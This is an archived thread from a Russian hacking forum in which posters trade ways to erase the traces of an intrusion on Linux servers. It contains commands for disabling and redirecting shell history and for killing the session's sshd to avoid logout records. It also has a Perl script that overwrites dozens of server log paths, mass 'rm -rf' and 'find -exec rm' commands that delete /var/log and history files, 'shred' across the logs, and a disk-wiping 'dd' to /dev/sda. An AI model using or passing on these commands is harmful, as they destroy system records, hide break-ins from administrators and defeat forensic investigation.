RDot

RDot (https://rdot.org/forum/index.php)
-   Целевые системы/Target systems (https://rdot.org/forum/forumdisplay.php?f=22)
-   -   Чистим следы (https://rdot.org/forum/showthread.php?t=3216)

br3d 30.07.2014 17:10

Чистим следы
 
  • Отключаем историю set +o history (set -o history если надо сново включить)
  • Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history
  • Если поставить пробел перед командой, то в history она не отобразится
  • Завершаем свой сеанс убийством процесса sshd созданного для нас (kill -9 $$), иначе если закрыть консольное окно или выйти по Ctrl+D останемся в логах
  • Для чистки логов можно использовать whitecat знает большинство путей популярных дистрибов в отличие от других лог клинеров не требует дополнительных либ, компилится без проблем.

У кого есть что дополнить ?

-Gory King- 31.07.2014 13:58

Код:

@files = qw(
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log.1
/etc/httpd/logs/access_log.2
/etc/httpd/logs/access_log.3
/etc/httpd/logs/access_log.4
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log.1
/etc/httpd/logs/error_log.2
/etc/httpd/logs/error_log.3
/etc/httpd/logs/error_log.4
/usr/local/apache/logs/error_log
/usr/local/apache/logs/suexec_log
/etc/httpd/logs/modsec_audit.log
/etc/httpd/logs/modsec_debug.log
/var/log/httpd/error_log
/var/log/apache2/error.log
/var/log/httpd-error.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/log/Xorg.0.log
/var/log/wvdialconf.log
/var/log/user.log
/var/log/pycentral.log
/var/log/mail.log
/var/log/apport.log
/var/bootstrap.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/fontconfig.log
/var/log/lpr.log
/var/log/maillog
/var/log/messages
/usr/local/apache/domlogs/ftpxferlog
/var/log/xferlog
/var/log/chkservd.log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/var/log/auth.log
/var/log/kern.log
/var/log/cron.log
/var/log/boot.log
/var/log/auth.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/nctfpd.errs
/var/log/httpsd/ssl.access_log
/var/log/ncftpd/misclog.txt
/var/log/nctfpd.errs
);
foreach $files (@files){
open (LOG_FILE , "<$files");
print LOG_FILE " ";
}
print "\n\n [+] Server Logs Cleaned Succesfully ! \n\n";
}


br3d 31.07.2014 16:48

Хороший список путей для проверки логов !
но, я так понял (перл слабо знаю) он логи полностью трет(

tex 31.07.2014 17:36

Цитата:

Сообщение от br3d (Сообщение 36729)
Если не вышло отключить history по хорошему, делаем так ln –s /dev/null .bash_history

Так это тоже трет все логи) И как думаешь удивиться админ увидя у себя слинкованные хистори )

Цитата:

не вышло
если не вышло - надо разбираться почему не вышло. В bash, sh и ksh например есть переменная HISTFILE, можно ее исправить, если пустая- то ни куда не пишется.


если все тереть то уж проще и главное надежнее так :
Цитата:

find /var/log/ -type f -exec shred -u {} \;

-Gory King- 31.07.2014 18:22

Ище вариант
Код:

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


madhatter 01.08.2014 10:57

Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.

b3 01.08.2014 18:24

мда...

Диагноз 01.08.2014 19:35

Чищу логи через
Цитата:

dd if=/dev/zero of=/dev/sda

dotr 02.08.2014 10:56

Цитата:

Сообщение от -Gory King- (Сообщение 36743)
Ище вариант
Код:

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


Национальный метод решения проблемы. Вроде все и почищено , но и админ видит что кто-то насрал большую кучу говна...

br3d 04.08.2014 15:48

Цитата:

Сообщение от madhatter (Сообщение 36745)
Хорошие у вас, однако, способы чистки логов. Нет логов - нет проблем. То есть, вообще нет логов. unset HISTFILE(без $ в начале) и чистка логов клинерами после.

хотели как лучше, а кончилось как всегда... (


Часовой пояс GMT +3, время: 21:04.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot